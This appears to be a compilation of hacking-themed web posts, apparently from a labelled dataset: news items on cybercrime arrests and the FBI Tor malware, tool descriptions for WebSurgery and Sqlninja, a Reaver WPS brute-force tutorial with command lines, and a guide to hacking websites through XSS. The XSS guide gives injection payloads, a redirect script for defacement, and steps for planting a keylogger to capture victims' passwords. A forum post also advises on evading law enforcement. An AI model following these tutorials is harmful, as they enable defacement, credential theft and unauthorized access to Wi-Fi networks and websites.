0 FBI arrests local man with ties to hacker group Anonymous

McALLEN — After an investigation stretching more than a year, federal agents arrested a man accused of trying to hack the Hidalgo County website as a member of the activist group Anonymous.

Fidel Salinas Jr. remains in federal custody pending a detention hearing after his arrest last week by the FBI on the charge of accessing a protected computer without authorization, court records show.

Cyber crimes agents at the FBI were called to assist a local investigation after the hacking of the Hidalgo County website Jan. 5, 2012, when more than 14,000 attempts to log on to its server were made, keeping network administrators from accessing it for about half a day, according to a probable cause affidavit.

From those 14,000 attempts, FBI agents were able to get the internet protocol — or IP — address of the computer used in the attack, and they tracked it to a house off Nolana Loop in Donna, according to the affidavit. The property owner said that her daughter’s boyfriend had moved into the house, and FBI agents seized various computers and other electronic equipment.

On Sept. 19, 2012, FBI agents interviewed Salinas about the hacking of the website and he said he wasn’t trying to do anything illegal but rather checking to see whether he could gain access in order to then alert network administrators as a courtesy, according to the affidavit.

On May 14, 2013, Salinas was interviewed a second time by the FBI, and he told agents that he would often talk with other members of the international hacker-activist group Anonymous via Web chat. He also told agents that if he found any derogatory information about Sheriff Lupe Treviño, he would either give the information to authorities or publish it himself.

In that same interview, Salinas claimed to have posted a Facebook comment aimed at Treviño that ended, in part, with the quote: “We do not forgive, we do not forget” — a tagline commonly used by Anonymous members.

0 The FBI Just Admitted to Hacking Into the Tor Network

Just over a month after reports of a malware attack on the anonymous Tor network, the FBI told an Irish court that it was behind the shenanigans. But don't worry, it was for a good cause.

The Tor hack was supposed to target associates of the Freedom Hosting's operator Eric Eoin Marques who's currently being detained in Dublin, Ireland for his involvement in a massive child pornography operation. Freedom Hosting has indeed been under suspicion of allowing kiddie porn on its servers for some time now, but the investigation took a turn for the technical when the Feds exploited a loophole in the version of Firefox that forms the basis for the Tor Browser Bundle.

On August 4, an error message started to appear on all sites hosted by Freedom Hosting. The accompanying hidden code contained a hidden iframe tag loaded with malicious Javascript, including a program file named "Magneto." This code was designed to seek out the hacked computer's MAC address, in an effort to identify the user. If you know anything about Tor, you know that the whole point of the software is to remain anonymous. The IP addresses behind the code pointed to servers in northern Virginia, not far from FBI headquarters.

The fun thing about this case—as with all of the NSA hacking business—is that the Feds' actions appear to be totally legal. It's just another case of a spying agency doing what it was designed to do: spy. And any of the innocent Tor users who were exposed along the way, well, too bad for them. This is America, where we have a right to privacy. Except for when the government says we don't. [Wired]

0 CA student hacking Anil Ambani's IT details: ICAI to hold inquiry

The Institute of Chartered Accountants of India today said it will conduct inquiry in the matter of the 21-year-old CA student allegedly hacking the Income Tax account of industrialist Anil Ambani.

Subodh Kumar Agrawal, president of ICAI, said the Hyderabad-based girl, who is pursuing her CA article-ship, would get a notice in this regard.

"The issue has been forwarded to the respective department," he said.

When asked if there would be any action against Manoj Daga & Company, the CA firm where the girl was doing her article-ship, Agrawal said it was too early to say anything.

"First we will inquire with the student and later if anything is found then we will go ahead for others," he said.

The girl allegedly hacked Ambani's e-filing of Income Tax returns, to find out details of his income and the tax he paid, according to Mumbai police.

A case was registered against her under the Information Technology Act on September 7.

2 Argentina arrests teen hacker who netted $50,000 a month

Police in Argentina have arrested a 19-year-old man accused of heading a gang of hackers who targeted international money transfer and gambling websites.

Dubbed "the superhacker", the teenager was making $50,000 (£31,500) a month, working from his bedroom in Buenos Aires, police say.

The arrest operation shut down the power to the entire neighbourhood to prevent the deletion of sensitive data.

Police say it took them a year to close in on the teenager.

The young man lived with his father, a computer expert, in Buenos Aires.

In the teenager's room, officials found high-capacity computers.

The hackers allegedly used malware attacks to build up a network of thousands of zombie computers, which were then used to illegally divert money from accounts leaving virtually no trace behind.

The police operation included five raids in the capital and the city of Rosario, about 300km (190 miles) north.

The young man is being accused of three crimes, and if convicted of all, could be sentenced to more than 10 years in prison.

0 HideMyAss VPN : Worst VPN in this World

Hello guys, if you do not want to go to jail, be smart not to use the services of the provider vpn hiddemyass, they're going to hand you over to the FBI,
Last month, it became clear that an alleged Lulzsec member who had carried out attacks on various organizations including Sony and Serious Organised Crime Agency in the UK, had used a service 'anonymous' VPN supplied by HideMyAss. According to documents obtained by TorrentFreak, VPN providers worried about bad publicity are now considering data sharing to combat 'fraudsters'. September 2011 is a month that HideMyAss VPN provider will want to forget. Dozens of news agencies told the story that an alleged Lulzsec member, allegedly partly responsible for attacks on Sony, Serious Organised Crime Agency UK, AT & T, Viacom, Disney, EMI, NBC Universal, and AOL NATO, not to mention the newspapers the Sun & The Times, had used their services to remain anonymous. But his plan failed in the biggest way imaginable. HideMyAss (HMA) keep logs and as a UK company when given a court order to cough up information they do. After combining date and time for the IP addresses in the blink of "recursion" eye Luzlsec member became 23 years old Cody Kretsinger of Phoenix. The FBI had their man. While public outrage has been well documented - many pro-privacy activists accused HideMyAss of becoming SellMyAss.
use paid services or open vpn securitykiss, there are several services free vpn market underground, good luck !

0 WebSurgery - Web Application Security Tool

Web application security is one of the key point to measure the security of a company profile. Website is very important, if the website is personal or if you are responsible for the website of your client, in both cases you must be careful about the security of the website. It is a good practice to be update to secure from exploitation but what about application layer security.

You must do a penetration testing on web application to find the vulnerabilities like, SQL-injectionXSS and others.

There are so many tools that has been discussed before but there is another good tool called WebSurgery, WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with the web application planning and exploitation. Currently, it uses an efficient, fast and stable Web Crawler, File/Dir Bruteforcer and Fuzzer for advanced exploitation of known and unusual vulnerabilities such as SQL InjectionsCross site scripting (XSS), brute-force for login forms, identification of firewall-filtered rules etc.

It has different tools built in to make the test efficient and less time consuming. It is available for windows but by using wine you can run it on Linux. The small description of the tools as below:
  • Web Crawler: WEB Crawler was designed to be fast, accurate, stable, completely parametrable and the use of advanced techniques to extract links from Javascript and HTML Tags.
  • WEB Bruteforcer: WEB Bruteforcer is a brute forcer for files and directories within the web application which helps to identify the hidden structure.
  • WEB Fuzzer: WEB Fuzzer is a more advanced tool to create a number of requests based on one initial request. Fuzzer has no limits and can be used to exploit known vulnerabilities such (blind) SQL Inections and more unsual ways such identifing improper input handling and firewall/filtering rules.
Click here to learn more like configuration details.

0 Sqlninja - A SQL Injection Tool

Vulnerability on database is really harmful for the web application, the most common type of attack on database is via SQL-injection. You should secure your web application from these harmful attack because database contain relevant information. There are different tools available to find the vulnerability on web application, as discussed before click here to learn more tools.

Like other tools Sqlninja is used to exploit SQL-injection vulnerability on a web application. Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.

Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:
Requirement
Since sqlninja is completely written in Perl, there is not much to install, except Perl itself and the following modules, if missing:
  • NetPacket
  • Net-Pcap
  • Net-DNS
  • Net-RawIP
  • IO-Socket-SSL
  • Net-Pcap
You will also need the Metasploit Framework 3 on your box to use the metasploit attack mode, and also a VNC client if you use the VNC payload.

Features
  • Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
  • Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental)
  • Privilege escalation to sysadmin group if 'sa' password has been found
  • Creation of a custom xp_cmdshell if the original one has been removed
  • Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
  • TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
  • Direct and reverse bindshell, both TCP and UDP

0 Reaver-wps WPA/WPA2 Cracking Tutorial

Reaver performs a brute force attack against an access point's WiFi Protected Setup pin number. Once the WPS pin is found, the WPA PSK can be recovered and alternately the AP's wireless settings can be reconfigured. While Reaver does not support reconfiguring the AP, this can be accomplished with wpa_supplicant once the WPS pin is known.

Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values.
The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10^4 (10,000) possible values for the first half of the pin and 10^3 (1,000) possible values for the second half of the pin, with the last digit of the pin being a checksum.
Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts. The speed at which Reaver can test pin numbers is entirely limited by the speed at which the AP can process WPS requests. Some APs are fast enough that one pin can be tested every second; others are slower and only allow one pin every ten seconds. Statistically, it will only take half of that time in order to guess the correct pin number.

Reaver WPA Cracking Tutorial

Reaver is only supported on the Linux platform, requires the libpcap and libsqlite3 libraries, and can be built and installed by running:

$ ./configure
$ make
# make install
To remove everything installed/created by Reaver:
# make distclean
USAGE
Usually, the only required arguments to Reaver are the interface name and the BSSID of the target AP:

# reaver -i mon0 -b 00:01:02:03:04:05
The channel and SSID (provided that the SSID is not cloaked) of the target AP will be automatically identified by Reaver, unless explicitly specified on the command line:

# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
By default, if the AP switches channels, Reaver will also change its channel accordingly. However, this feature may be disabled by fixing the interface's channel:

# reaver -i mon0 -b 00:01:02:03:04:05 --fixed
The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (minimum timeout period is 1 second):

# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
The default delay period between pin attempts is 1 second. This value can be increased or decreased to any non-negative integer value. A value of zero means no delay:

# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Some APs will temporarily lock their WPS state, typically for five minutes or less, when "suspicious" activity is detected. By default when a locked state is detected, Reaver will check the state every 315 seconds (5 minutes and 15 seconds) and not continue brute forcing pins until the WPS state is unlocked. This check can be increased or decreased to any non-negative integer value:

# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
For additional output, the verbose option may be provided. Providing the verbose option twice will increase verbosity and display each pin number as it is attempted:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv
The default timeout period for receiving the M5 and M7 WPS response messages is .1 seconds. This timeout period can be set manually if necessary (max timeout period is 1 second):

# reaver -i mon0 -b 00:01:02:03:04:05 -T .5
Some poor WPS implementations will drop a connection on the floor when an invalid pin is supplied instead of responding with a NACK message as the specs dictate. To account for this, if an M5/M7 timeout is reached, it is treated the same as a NACK by default. However, if it is known that the target AP sends NACKS (most do), this feature can be disabled to ensure better reliability. This option is largely useless as Reaver will auto-detect if an AP properly responds with NACKs or not:

# reaver -i mon0 -b 00:01:02:03:04:05 --nack
While most APs don't care, sending an EAP FAIL message to close out a WPS session is sometimes necessary. By default this feature is disabled, but can be enabled for those APs that need it:

# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this may be a sign that the AP is rate limiting pin attempts or simply being overloaded, a sleep can be put in place that will occur whenever these warning messages appear:

0 HACK WEBSITES USING XSS

website hack-wildhacker

What is XSS?, what can I accomplish with it?

XSS is common in search bars and comment boxes. We can then inject almost any type of scripting language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.

Reason Behind XSS vulnerability?

Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly allowing us to inject strings into the source code, that would then give us the conclusion of what we put in since it’s also in the source code. They did not bother to filter what we type in. They allowed characters such as “>, “, /”, etc.
Types of XSS

There are three types of XSS. DOM-based, Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it’s still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.

How to test for XSS vulnerabilities?

To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We’ve found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.

**<*script*>alert(‘XSS’);

(Important:Please remove “*” or type the above text on search box without “*”)

Now we will see a pop up message “XSS”shown In picture

In some cases, a message might not pop up. If it doesn’t work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.

*>*alert(‘XSS’); (Important:Please remove ‘*’ or type the above text on search box without ‘*’) Now, we have found out that it is vulnerable.Lets go to next step.

deface/Hacking a webpage with XSS?

Here is the important part that explain defacing website i have methods for both persistent, and non-persistent XSS.

Persistent XSS.

First I will be starting with persistent XSS. Since it’s persistent I want to redirect my victims to a deface page. We simply just inject this some more Javascript like we did before: <*script*>window.location=”*http://yourdefacepage.com/index.html”;<*/script*> (Important:Please remove ‘*’ or type the above text on search box without ‘*’) Remember, you can always alter the code if it doesn’t work. You can do many things with XSS, you just need all the right strings. I’m only focusing on defacing, since most people just deface sites these days.

Non-persistent XSS.

Obviously we can’t redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.

How to make a cookie logger?

As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website.

To perform this Attack we need three thigs

Xssed Site(That is a xss vulnerable site)

Webhosting sevice (Free) ==> http://www.000webhost.com/

Keylogging Script

First Of all Download the script from the below link

Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file.

Now open Logger.js and change the URL of your script. Default URL is http://yourwebsite.comjust Change it to your hosting URl.

Now host all these scripts on your web host.

Now find a XSS vulnerable website website and include script link like this:

Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script.

If a website’s login page is vulnerable to XSS attack, this script can be used to grab passwords.

DOM-based XSS

What is DOM?

DOM is expanded as Document object model that allows client-side-scripts(Eg: Javascript) to dynamically access and modify the content, structure, and style of a webpage.

Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of DOM.

Here is a very simple HTML code that accepts and writes user input using JavaScript with the help of DOM.
